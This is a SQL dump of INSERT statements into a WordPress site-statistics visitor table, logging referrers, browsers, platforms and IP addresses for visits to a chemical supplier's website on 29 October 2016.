INSERT INTO `wp_statistics_visitor` VALUES (13361, '2016-10-29', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13362, '2016-10-29', 'C81B3656CB21C49B3C219.139.82.219', 'MSIE', 'Windows', '9.0', '', '101.226.89.116', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13363, '2016-10-29', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '219.139.82.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13364, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '38.0', '', '104.239.198.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13365, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '85.207.42.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13366, '2016-10-29', 'https://sravniceniuniverse.tumblr.com/', 'Firefox', 'Windows', '43.0', '', '188.186.81.31', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13367, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '5.44.115.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13368, '2016-10-29', 'https://www.spacetechexpo.com', 'MSIE', 'Windows', '9.0', '', '184.94.12.142', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13369, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '93.208.234.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13370, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.112', '', '64.132.113.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13371, '2016-10-29', 'https://www.google.com/search?client=safari&rls=en&q=epoxy+release+agent+that+will+not+interfer+with+finishes&ie=UTF-8&oe=UTF-8', 'Safari', 'Macintosh', '5.1.9', '', '71.210.46.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13372, '2016-10-29', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13373, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '154.70.5.225', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13374, '2016-10-29', 'https://www.google.com/', 'Chrome', 'Android', '54.0.2840.68', '', '68.226.189.35', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13375, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '115.239.213.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13376, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '115.239.215.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13377, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '115.239.215.113', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13378, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '10.191.169.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13379, '2016-10-29', 'https://www.miller-stephenson.com/', 'Chrome', 'Android', '27.0.1453', '', '65.57.245.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13380, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13381, '2016-10-29', 'https://www.bing.com/search?q=eponex+resin+1510&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13382, '2016-10-29', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/eponex-cycloaliphatic-resin/', 'MSIE', 'Windows', '9.0', '', '204.79.180.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13383, '2016-10-29', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '199.241.14.253', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13384, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '39.0.2171.95', '', '79.110.25.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13385, '2016-10-29', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.17', '', '79.110.25.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13386, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13387, '2016-10-29', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/', 'Safari', 'iPhone', '7.0', '', '199.30.24.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13388, '2016-10-29', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '47.150.143.175', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13389, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '148.251.176.212', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13390, '2016-10-29', 'https://www.miller-stephenson.com', 'Drupal', 'Unknown', 'Unknown', '', '162.209.95.9', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13391, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '2605:e000:1c0c:22a:e40b:8965:ed17:c9a6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13392, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '27.0.1453', '', '2605:e000:1c0c:22a:e40b:8965:ed17:c9a6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13393, '2016-10-29', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '71.235.108.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13394, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.120.206.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13395, '2016-10-29', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.247.22.35', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13396, '2016-10-29', 'https://www.google.co.in/', 'Chrome', 'Windows', '54.0.2840.71', '', '117.247.177.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13397, '2016-10-29', 'https://www.google.com.tw/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwi2_r3Blv_PAhUMe7wKHSuiB0wQFggrMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-67-radical-initiator%2F&usg=AFQjCNF6JQqQTvTAJszhPay_5GmxN2I4Hw', 'MSIE', 'Windows', '11.0', '', '140.127.214.85', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13398, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '76.76.183.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13399, '2016-10-29', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '43.224.35.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13400, '2016-10-29', 'https://www.google.com.mx/', 'Chrome', 'Windows', '54.1.2840.59', '', '177.248.203.23', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13401, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '140.32.183.252', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13402, '2016-10-29', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '74.217.90.250', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13403, '2016-10-29', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '74.217.90.250', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13404, '2016-10-29', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '74.217.90.250', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13405, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '31.148.231.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13406, '2016-10-29', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '84.241.47.99', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13407, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13408, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13409, '2016-10-29', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '34.0', '', '172.245.251.232', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13410, '2016-10-29', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '172.245.251.232', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13411, '2016-10-29', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '172.245.251.232', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13412, '2016-10-29', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.3.65', '', '172.245.251.232', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13413, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '125.99.121.198', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13414, '2016-10-29', 'https://www.google.com.vn/', 'Chrome', 'Windows', '54.0.2840.71', '', '14.161.23.160', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13415, '2016-10-29', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '34.0', '', '192.99.2.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13416, '2016-10-29', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.17', '', '23.92.120.230', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13417, '2016-10-29', 'https://www.miller-stephenson.com', 'PHP', 'Unknown', '5.', '', '23.92.120.230', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13418, '2016-10-29', 'https://www.miller-stephenson.com', 'PHP', 'Unknown', '5.2.99', '', '23.92.120.230', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13419, '2016-10-29', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.127.129', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13420, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.165.212.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13421, '2016-10-29', 'https://limtu.ifmo.ru/', 'MSIE', 'Windows', '6.0', '', '46.119.118.233', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13422, '2016-10-29', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.25.163', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13423, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '117.253.232.214', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13424, '2016-10-29', 'https://www.provisov.net/', 'MSIE', 'Windows', '6.0', '', '178.137.95.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13425, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.116', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13426, '2016-10-29', 'https://pc-services.ru/', 'Opera', 'Windows', '7.11', '', '176.8.88.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13427, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '121.34.191.146', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13428, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '54.0.2840.71', '', '168.150.26.70', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13429, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '5.44.114.92', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13430, '2016-10-29', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.7.0', '', '185.129.148.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13431, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '117.211.151.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13432, '2016-10-29', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '174.139.160.138', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13433, '2016-10-29', 'https://www.google.com/', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.33.239', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13434, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.128.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13435, '2016-10-29', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-aerospace/', 'Safari', 'iPhone', '7.0', '', '65.55.210.235', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13436, '2016-10-29', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '24.176.242.122', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13437, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '2605:e000:1c0c:22a:308c:4500:8901:c6e2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13438, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '27.0.1453', '', '2605:e000:1c0c:22a:308c:4500:8901:c6e2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13439, '2016-10-29', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '81.169.247.241', '000', 53, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13440, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '2605:e000:1c0c:22a:308c:4500:8901:c6e2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13441, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '78.47.127.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13442, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13443, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.63.196.32', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13444, '2016-10-29', 'https://www.google.nl/', 'Safari', 'iPhone', '8.0', '', '83.82.109.179', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13445, '2016-10-29', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/', 'Safari', 'iPhone', '7.0', '', '199.30.25.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13446, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '180.210.204.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13447, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.138.168.125', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13448, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '87.76.17.35', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13449, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13450, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '212.210.74.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13451, '2016-10-29', 'https://x-lime.net/', 'MSIE', 'Windows', '6.0', '', '46.119.119.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13452, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '213.200.229.152', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13453, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13454, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13455, '2016-10-29', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '47.0.2526.111', '', '187.45.151.236', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13456, '2016-10-29', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '12.110.101.242', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13457, '2016-10-29', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '71.114.78.159', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13458, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '148.251.238.7', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13459, '2016-10-29', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '86.123.240.6', '000', 53, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13460, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '37.187.26.44', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13461, '2016-10-29', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.188', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13462, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '128.127.71.230', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13463, '2016-10-29', 'https://ttsgco.blogfa.com/', 'MSIE', 'Windows', '11.0', '', '91.98.32.85', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13464, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '63.117.208.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13465, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '208.109.181.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13466, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13467, '2016-10-29', 'https://www.bing.com/images/search?q=krytox+grease&view=detailv2&&id=DFF03BD860E065A4ED087A052B58D4DCB2F27684&selectedIndex=215&ccid=yrKxWOk8&simid=607986011040387008&thid=OIP.Mcab2b158e93ca7c69686e4cb0643a2afo0&mode=overlay', 'MSIE', 'Windows', '11.0', '', '10.113.1.111', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13468, '2016-10-29', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '91.98.108.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13469, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '198.57.247.218', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13470, '2016-10-29', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '93.159.230.88', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13471, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '78.8.96.54', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13472, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '61.104.94.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13473, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '176.115.243.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13474, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '183.13.155.252', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13475, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13476, '2016-10-29', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '124.176.54.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13477, '2016-10-29', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj0h6qukYDQAhUSlX4KHWQHAvwYABAF&sig=AOD64_01PsZsAK4e_sHBRClgvVTFSg3mDg&rct=j&q=&ved=0ahUKEwjtxaWukYDQAhUn54MKHVqlCpQQ0QwIJQ&adurl=', 'MSIE', 'Windows', '11.0', '', '96.47.201.54', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13478, '2016-10-29', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '74.209.129.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13479, '2016-10-29', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '107.3.95.149', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13480, '2016-10-29', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/aerospace-aviation-series/krytox-aerospace-aviation-greases/', 'Safari', 'iPhone', '7.0', '', '199.30.24.109', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13481, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.120', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13482, '2016-10-29', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '216.9.107.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13483, '2016-10-29', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '202.65.158.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13484, '2016-10-29', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '96.9.223.45', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13485, '2016-10-29', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '96.9.223.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13486, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13487, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13488, '2016-10-29', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '71.235.108.218', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13489, '2016-10-29', 'https://mschem.com/robots.txt', 'MSIE', 'Windows', '9.0', '', '104.236.81.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13490, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '178.140.134.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13491, '2016-10-29', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0.1', '', '172.8.68.217', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13492, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.17', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13493, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13494, '2016-10-29', 'https://mschem.com/robots.txt', 'Chrome', 'Windows', '34.0.1847.131', '', '45.55.229.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13495, '2016-10-29', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '174.193.133.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13496, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'iPhone', '54.0.2840.66', '', '75.84.178.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13497, '2016-10-29', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '216.252.43.179', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13498, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '103.233.194.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13499, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.208.28.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13500, '2016-10-29', 'https://www.miller-stephenson.com/chemicals/mold-release-agents/', 'Safari', 'iPhone', '7.0', '', '199.30.24.48', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13501, '2016-10-29', 'https://ttsgco.blogfa.com/', 'Chrome', 'Android', '52.0.2743.98', '', '5.125.183.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13502, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '93.51.217.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13503, '2016-10-29', 'https://australia-opening-times.com/', 'MSIE', 'Windows', '6.0', '', '5.248.253.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13504, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13505, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.160', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13506, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13507, '2016-10-29', 'https://www.google.lt/', 'Chrome', 'Windows', '53.0.2785.143', '', '78.58.190.118', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13508, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13509, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.147.243.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13510, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '85.115.224.204', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13511, '2016-10-29', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '89.42.144.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13512, '2016-10-29', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '89.42.144.60', '000', 1, 0); 
